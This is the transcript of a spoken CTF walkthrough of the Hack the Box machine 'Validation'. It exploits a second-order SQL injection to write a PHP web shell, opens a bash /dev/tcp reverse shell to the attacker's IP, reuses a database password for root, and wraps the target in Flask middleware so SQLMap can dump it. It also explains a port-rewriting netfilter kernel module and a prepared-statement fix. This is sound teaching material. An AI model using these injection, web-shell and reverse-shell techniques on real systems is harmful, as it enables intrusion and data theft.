What's going on YouTube? This is Ipsec doing validation from the Ultimate Hacking Championships September qualifiers, and this box is now playable on Hack the Box. The UHC September qualifiers is always the first Friday of the month, and the first 10 people to complete it or get the farthest on this machine earn their spot in the UHC September finals, which is the last Sunday of the month, and this one is going to be on the 26th. The box is an easy box. Essentially, it's just a second order SQL injection, but we're going to go into a lot of stuff after we solve the box, so let's just jump in. As always, we start with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it validation, and then the IP address of 10.10.11.116. This can take some time to run, so I've already ran it. Looking at the results, we have a handful of ports open. The very first one is SSH on port 22, and its banner tells us it's an Ubuntu server. Then we have HTTP on port 80, and its banner is telling us it is Debian. So Apache oddly is saying Debian, and SSH is saying Ubuntu. In real world situations, this normally means the IP address you're scanning is a firewall or a router and it's doing some type of NAT or network address translation, or maybe it's PAT, port address translation. Those two kind of get lumped together as the same thing so often. But essentially, it means different ports go to different boxes because you have a huge network and just one IP address. However, in CTFs, it generally means there's some type of nested virtualization, either like VMs or Docker containers. And in this case, it's going to be a Docker container. And at the end of the video, we'll kind of go over this a little bit. And then we have ports 5000 and 5004 just filtered, probably means IP tables has blocked them. And then on port 8080, Nginx is open, but it just reports bad gateway. So let's go and just check out the website, since port 80 looks like where it has the most information. Going to 10.10.11.116, we can see a page that has a registration, just says join the UHC September qualifiers. And if we put a username here and click register, it says welcome and then other players in this area. So if I go back and we do, let's say, please subscribe, we can see Ipsec and please subscribe are playing in Brazil, and we can just do test user, put them in a different country to see exactly what is going on here. So nothing too special. We can go into Burp Suite, turn interception on, click join now. And then let's try something weird. I'm going to do a single quote after the country because it looks like we can edit the country. This is a drop down a combo box, so we generally can't edit it. But if we intercept it, it's just sending plain text. So let's do another unique username of, let's just say IP. Send it over to the repeater tab. And we have a 302 found. It puts the cookie as this and then redirects us. So I'm going to click follow redirection, and it did not rewrite my cookie. So I noticed the old country was there. So when you click follow redirect, if there's a set cookie thing in Burp Suite, it looks like it won't set it. And we can see welcome IP, other players in Brazil with this single quote, and then it's a SQL error saying call to member function fetch association on Boolean. So the SQL query returned 0 results and it was expecting a result, so it crashed. That's what that error message is. And the weird thing also is if we go back and we keep sending this registration, we're getting something static here, right? It's always 0D9 whatever. So I'm going to grab this cookie because this looks like it could be another finding if we're just doing a basic pen test. And we can see it is 32 characters. So chances are this is a MD5 sum. We use the username IP. So if I just do MD5 sum here, we can predict the cookie because that matches. So all this cookie is doing an MD5 of your username. If we wanted to see that SQL error message inside of Burp Suite, we can edit the cookie. So all I did was press F12 to bring up the developer bar, then go to storage, cookies, and then edit the user cookie to be the one I want. We can turn Burp Suite off, go to /account.php, and that is the wrong cookie. We want 0D. There we go. Refresh. And now we have this one, uncaught error. So there is a second order SQL injection. And what that means is the data that the SQL query is pulling out of the database is tainted and has an issue. You find this in applications because a lot of developers just have the mindset of don't trust any data coming from the user. So they always put some type of sanitization around that data. And they generally may trust data coming from the database because it's not the user, right? In their mind, the data was in the database. This is a trusted data source, so I don't have to do all my sanitization there. But if you can put bad data into the database, then it gets trusted, and when they use it for a future query, that fails. So we can go over the source code once we get a shell on the box. I'm going to change my username to shell. So we get a new cookie, and we can, actually, this will be enum, because we want to find a valid union injection for this. So we're going to do a single quote, then union select 1, and then a comment. And if this passes, then we know the SQL query is only expecting one column. If this fails, then I'm going to do union select 2. So going here, let's copy this new cookie, go over to Firefox, and see what happens. So it looks like it passed. Other players playing in Brazil, and we got our first two users, IPSEC and please subscribe. Then we also have this one. So the query worked just fine. If we wanted to, we can call this fail, and we can do union select 2. Copy the cookie, paste it in, and we can see if we have a unbalanced number of parameters on the statement, it fails. And by unbalanced, I mean the SQL query the page is using is expecting one column, and our union is specifying 2. So 2 on one side, 1 on the other becomes unbalanced and fails. So now we know we can put data here. We can put any data, actually. So this is going to be SQL injection here. I'll just call it fail2. Or actually, this is going to be enum2, I guess. But if I paste this, we can see the union injection put SQL injection here. So we can make this be anything we want. So what I'm going to do is put a web shell. So we'll do PHP and then system request, and we can use single quotes like that. And then we can say into out file and var www.html. This is the default web directory of Linux boxes. And I'll just call this shell.php. And the username I'll put as shell. We can copy the cookie, refresh, and we actually error, but I think the error is what we're expecting because we wrote the results into an out file, so it didn't return anything. So it errors, but if we hit the page, it may be there. So if I go to shell.php, we have IPSEC please subscribe, and then system can't execute a blank command. So we have successfully wrote a shell. So if I do cmd equals ID, I did IP, but let's change that over to ID. We get what we want. So let's send this over to Burp Suite. Turn intercept off. Send this. And then we can, let's see, change request method. And then do a bash reverse shell. So bash-c, bash-i, dev tcp 10.10.14.8, I think is my IP, 9001, 0 at and 1, like that. Let's make sure we're listening. nclvmp 9001. Send. Did not work, but I have not URL encoded it. So I highlight it and then press Control U to URL encode. We don't get a response back, which is a good sign that we have a shell. So now with the shell, I'm going to do python 3-c import pty pty.spawn bin bash, and python 3 is not found. If I do which python 3, we don't have Python. I can do find slash, put the errors to dev null, grep for Python, and Python just isn't installed in this box. So we can look at the files on this. We could try other methods to get a shell. I'm going to try this. I always forget the syntax to this. I think it's just script-q, then dev null bash. Then let's do stty raw minus echo, fg enter enter. Yeah, I still don't have tabs. So that did not do it. Let's see. I know there's a way to use script to get a TTY. Let's see. Is there like a -i flag or something I'm missing? Flush, log out. No idea. But we can move on. We can see there is account, config, CSS, index, and shell. So this is what we created. We're trying to find the database password, and that's going to be probably in config. So if I cat this file out, we can see the username to the database is UHC, and then the password is UHC 9qualifier 9qual global PW. It saying global in it is a hint that this password is used elsewhere, so we can just try to SU to it. And if I had my clipboard right, it would have worked. So let's do SU dash, paste it in, and we get root, and this is where root.txt is. And this is a little bit weird than most Hack the Box machines because we're not escaping the container. This web shell is in a Docker. And the reason why I did this is because UHC is a like public event. This VM's not behind a VPN. So you have a lot of people attacking this box at the same time. So I did some really weird load balancing within Docker in a kernel module I wrote. So to show that, I'm just going to SSH into my dev machine. So I think that was 134. I think the user's Ubuntu. User may be HTB. Let's try that. HTB. Yeah, user was HTB. So ip.ko was in this directory. I had just removed the source code from the box I uploaded to Hack the Box. But we can take a look at the source here. And this is a simple kernel module that I wrote a long time ago for sync that we didn't end up using because OXDF had created a solution within IP tables. And we didn't want to put a hacked together kernel module in a box because who knows where it could fail. But I still had the source code around and decided to use it for this box. The start of the module is this lkm init function, and that's just local kernel module initialization. And it's going to print a message that just says the kernel module is loaded. And then we have nfho and nfhi. This is network filter handle out and network filter handle in. And it's just defining it so we can build a hook. And then here we have initialize net filter hook for incoming packets. And essentially, if you just Google nfho hook, I think, you'll get the template I used to build this. So nfho-hook. Let's see. Yeah. This is pretty much what the code is based off of. And I think this is just sending it to like IP tables afterwards, but we put a hook at first and we're calling a function in hook from our application. So on the out hook packet is the same exact thing. So at the very start, we call our parameters. So if you were building like a backdoor that you wanted to work, even if IP tables blocked it, you could probably insert this in and do a function before it. What we're doing is just rewriting the packet header to go to a different destination. So here's this unsigned input hook, and all this is doing is checking if it's an IP packet and eventually getting down here. And we have the read-write destination port. Or I think this is actually read-write, my horrible naming convention. But yeah, we're rewriting the destination port to equal the last octet of the IP address, modulo 31 plus 5000. So in this case, there are 31 IPs this could be running. And all it's doing is, let's go to Google real quick, google.com. The modulo is like a remainder in division. So 1 modulo 31 is going to be 1. 16 modulo 31 is going to be 16. Because it's below 31. If we go to 32, now this is going to be 1 because it's 1 above 31. If the last octet of the IP was 230, then that changes the number to 13. And then we add the 5000. So now it's 5013. So that's how it's doing its routing. We have a lot of Docker containers up listing on ports 5000 to 5031. And it's taking the last octet, modulo 31, so we always get within the range, and then adding it to 5000. So here, D port and source port. And we're saying if the destination port is equal to 80, then rewrite this header. And there is a bug here, like when I install this Kernel module, I can no longer send packets out port 80 because, actually no, I can. I forget where the bug is, but I figured I said that because this is an input hook. But if the destination port is 80, then we're rewriting the header to go to the new packet and then going through the normal thing. Same thing with pretty much the out hook. If the source port is between, I did 4995032, like one below and one above, just because I'm always paranoid about excluding something. I think you could probably get away with 5000 and 5031, but besides the point. Then we're rewriting it back to be 80. And we have to do this because when we send this packet, we're rewriting it from 80 to, let's say, 5001. And then that server is responding. It thinks the destination was 5031, so it sets its source to 5031 when it sends it back to the client. And the client's like, what is this source? This should be 80. So that's what this piece is doing. So that is the kernel module that hooks this. And if I do like a Docker PS, you can see all the containers that are running. So that is how that routing works. Let's look at the code for SQL injection. So if I go into www, I can look at account. And this is where we do the second order SQL injection. So actually we can look at registration first. Config, no. Index. So this is getting a MD5 of the username. We're inserting into registration. And then if there is a error, because this execute, this returns a Boolean. So if this succeeds, we execute the code and everything's fine. If it fails, then it goes on. And now we're just updating the user to change where they registered at. But this piece of code isn't too important. The important thing to go over is the prepared statements. So we have this connection to prepared, and then we bind param, and this SSSI This is string, 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 integer. If we look at Google and do bind underscore param, probably, we can probably see all the features. Bind param PHP. Let's see. We can do W3 school as well if this doesn't have it. Types, yeah. We can do integer, double, string, and blob. I'm guessing blob would be like binary data. But these are the parameters. So the very first parameter is a string. Second parameter, user hash. This is a string. Country, string, and then the time. And that is going to be an integer. So doing it this way, it's not vulnerable to SQL injection. We can go into account. And we can see the very first thing. It's grabbing the, let's see, what is this grabbing? Fetch association. Okay, country and username. We should have two queries here, right? Yeah. So we're doing a select username country from registration where user hash is equal to question mark. And again, this is where we're going to do a bind param for a prepared statement. So SQL bind param s passing the user, and that is going to be the cookie, and we execute. And we retrieved two rows, username and country. So with this fetch, this is putting the welcome player name, then other players in your country is this. And here we're doing a second SQL statement. And there is no, like, in this select, you don't see a question mark. And it's just pulling it from the database. So this is the prepared statement from above this row. And it just passes it to query. And because there's no sanitization here, then this is just going to be a SQL injection, because there's nothing in the database preventing the country from being invalid. So if we wanted to harden this, I mean, it would be pretty simple. We just do where country is equal to probably question mark, like that. And then we can take the code up. So take these two lines, paste this. So we're preparing the SQL statement, and we do bind param, and then this would be row country. And then, let's see, is it SQL query? No, execute. And that would pretty much be, oh, we need to get result like this. There we go. So I think this would be the working code for it to be fixed. It's a bit of pain to rebuild all these Dockers, so I'm not going to do that. But you should get the idea of what a prepared statement is and how second order SQL injection works. Yeah. So if you have questions, leave them in the comments below. Apologies for the sloppy cut. I realized I said I wanted to show exactly how you can create some middleware so SQLMap can detect this, and I forgot to do that. So let's do that now. The first thing we want to do is verify that SQLMap will not be able to exploit this box regularly. So I'm just going to go here. We're going to create a user, send to Burp Suite, join, and in Burp Suite, let's clear our cache to get to where we want, right here. Copy the file, and I'm going to call this test.request. And then we can go here, SQLMap-R, test.request. It got a 302 redirect. Yes, we want to follow it. Redirect is a result of post. Do you want to resend original post data to new location? No, we don't, because it's just the cookie that we care about on this account.php page. And we can see it gets a bunch of weird error messages and then fails. So SQLMap doesn't like this challenge for whatever reason, but we can create some middleware to help SQLMap out. So the very first thing I want to do for this is Google a hello world application. So Python 3 Flask hello world. And this is just generally how I like creating quick web apps, is using Flask. So if we go here, you can read this to set up an environment, but the main thing we want is just this piece of code. So from Flask import whatever. So let's call this middleware.py, I guess. And we can put that on port 80, sudo python 3 middleware.py. And when we go to localhost now, we get the web application. So the goal here is, in this web app, we do all the logic to get to the SQL injection, and then we just hand it off to SQLMap. So Flask also has a request feature, or a request library. So from Flask import request, and this is how we get variables. So we want to return, I think it's just request.get. Actually, we can Google this. Request return get variable. Actually, Flask. There we go. Return. Let's see. HTTP variables. Name parameters and URL like this. Request.args. So it's request args get. Args get country. So if we save this, run it again, and I put a country, we can put anything we want here. And this is pretty much all we need to create the application. The next piece is we just have to send the code, or send the request. So let's get rid of this return and do data equals, and we need username, and then also the country, because this is going to be used to generate the account. So we have that, and I just want to verify it is username and country. So actually we have the test.request we can look at. So we're sending a post, username equals test, country equals Brazil. And for the username, we just want to give it something random. I think this may be why SQLMap was failing. We could pass the --eval flag to SQLMap to make username random. If you don't know how to do that, just go to ipsec.rocks. I did a video on that recently, or you can do the SQLMap Academy course, which covers it. But in Python, I'm just going to do import UUID, and for the username, we're going to set it to uuid.uuid4.hex. If you're curious what that is, we can just Python 3 import UUID. Let's see, UUID.UID. This is a function like that. There we go. And that's what it looks like. It's just a random unique identifier. This is like the quickest way I could get random strings in Python. They do have like a rand int feature, but for some reason I just like doing this UUID thing. So we have this. We need to import request now. And this is the library to send HTTP requests. And what we want to do is do request.post HTTP 10.10.11.116, and then we need to send it the data. And I'm going to do our equals like this so we can get the response, and we can just return our.text. And we'll see if this works. So if I now go to localhost country, and then we can say the country is IPSEC, we get this page. So this looks like it'll work. So now all we have to do is make this request go to SQLMap and then test it out. So go here, refresh this page. Let's see, copy to file. I'll call this localhost.request. And we can go here, Python, or not Python 3, SQLMap -r localhost.request. And then I'm going to do -dbms MySQL to speed it up. I think it's --dbms maybe. And --technique is equal to U for union. Let's see if this works. There we go. So now it's testing it. Country does not seem to be injectable. What if I just take all this out? What parameters did I use? MySQL. Let's try this. Continue. So we see heuristic cross-site scripting test shows country might be vulnerable to cross-site scripting attacks, which is a good sign that it's doing dynamic content. So it's just going to run through all these. And I'm curious why when I added all those flags it didn't work. So we'll see if this works. It's doing MySQL time. Let's see, country is time SQL. Do we want to skip all the other databases? Yes. And then we're just going to keep going on. And it now has validated that the country is union injectable. Do I want to keep going? No, I do not. And we have it here. So I can just do --dump now. And we can dump all the data. It's going to try cracking a lot of the passwords, but yep, this is how you could have created that middleware. So, hope you guys enjoyed that. Take care, and I will see you all next week.